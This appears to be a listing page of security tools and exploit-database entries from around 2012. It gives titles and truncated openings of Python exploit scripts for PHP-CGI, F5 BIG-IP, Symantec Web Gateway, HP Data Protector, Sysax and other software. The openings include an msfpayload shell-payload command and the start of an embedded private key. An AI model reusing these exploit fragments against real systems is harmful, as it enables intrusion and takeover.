[Http-enum] Automated HTTP Enumeration Tool

Null Security Team writing a python script for Automated HTTP Enumeration. currently only in the initial beta stage, but includes basic checking of files including the Apache server-status as well as well IIS WebDAV and Microsoft FrontPage Extensions, many more features will be added to this tool...

SAP NetWeaver Message Server - Multiple Vulnerabilities

SAP NetWeaver Message Server - Multiple Vulnerabilities 1. Advisory Information Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date...

[Knock] Subdomain Scanner

Knock is a python script, written by Gianni 'guelfoweb' Amato , designed to enumerate subdomains on a target domain through a wordlist. For more information I have posted a documentation page. If you want to see how it works, you can see this sample output: Simple Scan Zone Transfer Scan Wildcard...

PHP-CGI Argument Injection Remote Code Execution

!/usr/bin/python import requests import sys print """ CVE-2012-1823 PHP-CGI Arguement Injection Remote Code Execution This exploit abuses an arguement injection in the PHP-CGI wrapper to execute code as the PHP user/webserver user. Feel free to give me abuse about this " sys.exit0 target =...

Broadcom DoS on BCM4325 and BCM4329 Devices

Exploit for hardware platform in category dos / poc Exploit Author: CoreLabs Core Security Technologies fue descubierta por el investigador argentino Andrés Blanco, Vendor Homepage: Software Link: download link if available Version: 1.0 Tested on: Apple iPhone 3GS Apple iPod 2G HTC Touch Pro 2 HT...

ActFax Server 4.31 Build 0225 - Local Privilege Escalation

!/usr/bin/python Title: ActFax 4.31 Local Privilege Escalation Exploit Author: Craig Freyman @cd1zz Discovered: July 10, 2012 Vendor Notified: June 12, 2012 Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html msfpayload windows/exec CMD=cmd.exe R | msfencode -e...

Symantec Web Gateway 5.0.3.18 Password Change

!/usr/bin/python import urllib import urllib2 import re import sys print " " print " Symantec Web Gateway " exit0 ip = sys.argv1 username = sys.argv2 password = sys.argv3 url = "https://%s/spywall/temppassword.php" % ip opts = 'target':'executivesummary.php', 'USERNAME':username,...

Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change

Exploit for linux platform in category web applications !/usr/bin/python import urllib import urllib2 import re import sys print " " print " Symantec Web Gateway " exit0 ip = sys.argv1 username = sys.argv2 password = sys.argv3 url = "https://%s/spywall/temppassword.php" % ip opts =...

HP Data Protector Client 6.11 / 6.20 Remote Code Execution

!/usr/bin/env python Exploit Title: HP Data Protector Client EXECCMD Remote Code Execution Vulnerability Date: 2012-12-06 Exploit Author: Ben Turner Vendor Homepage: www.hp.com Version: 6.11 & 6.20 Tested on: Windows 2003 Server SP2 en CVE: CVE-2011-0922 Notes: ZDI-11-056 Reference:...

F5 BIG-IP - Authentication Bypass

F5 BIG-IP - Authentication Bypass !/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w"...

F5 BIG-IP - Authentication Bypass

!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w" filewrite.write"""-----BEGIN RSA PRIVATE KEY-----...

F5 BIG-IP Remote Root Authentication Bypass

!/usr/bin/python Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability py Quick script written by Dave Kennedy ReL1K for F5 authentication root bypass http://www.secmaniac.com import subprocess,os filewrite = file"priv.key", "w" filewrite.write"""-----BEGIN RSA PRIVATE KEY-----...

Heap spraying Adobe Illustrator

Due to the recent patched vulnerabilities in Adobe Illustrator CVE-2012-2023, CVE-2012-2024, CVE-2012-2025, and CVE-2012-2026 it becomes interesting to analyze the exploitability facts of the .ai file format. Early versions of the AI file format are true EPS files with a restricted, compact synta...

HT Editor Spawning Root Shell

Exploit for linux platform in category remote exploits !/usr/bin/python Exploit Title: HT Editor Spawning Root Shell Date: 29-Mar-2012 Author: blusp10it Version: 2.0.18 Download: http://sourceforge.net/projects/hte/files/ht-source/ht-2.0.18.tar.gz Tested on: BackTrack 4 R2, Ubuntu 10.04 Run with:...

Sysax Multi Server 5.53 - SFTP (Authenticated) (SEH)

!/usr/bin/python Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit Egghunter Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Software Versions Tested: 5.53 Date Discovered: Febrary 22, 2012 Vendor Contacted: Febrary 23, 2012 Vendor Response: February 27, 2012 Vendor Fix: Version 5.55...

DPScan : Drupal Security Scanner Released

DPScan : Drupal Security Scanner Released The First Security scanner for Drupal CMS has been released by Ali Elouafiq, on his Blog. His team develop a tool that will enumerate at least the modules used by Drupal so we can simulate a White Box audit on our private machines. This small tool is publ...

Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)

Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution Egghunter !/usr/bin/python Title: Sysax Multi Server " sys.exit1 target = sys.argv1 port = intsys.argv2 user = sys.argv3 password = sys.argv4 opersys = sys.argv5 base64 encode the provided creds creds =...

Microsoft Windows - Assembly Execution (MS12-005)

Microsoft Windows - Assembly Execution MS12-005 Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability Date: 1/14/2012 Author: Byoungyoung Lee, http://exploitshop.wordpress.com Version: Windows 7 32bit, fully patched until Jan 2012 Tested on: Windows 7 32bit CVE :...

Microsoft Windows - Assembly Execution (MS12-005)

Exploit Title: MS12-005 : Microsoft Windows Assembly Execution Vulnerability Date: 1/14/2012 Author: Byoungyoung Lee, http://exploitshop.wordpress.com Version: Windows 7 32bit, fully patched until Jan 2012 Tested on: Windows 7 32bit CVE : CVE-2012-0013 PoC:...

PHP Hash Table Collision - Denial of Service (PoC)

!/usr/bin/env python """ This script was written by Christian Mehlmauer https://twitter.com/!/FireFart Sourcecode online at: https://github.com/FireFart/HashCollision-DOS-POC Original PHP Payloadgenerator taken from https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision...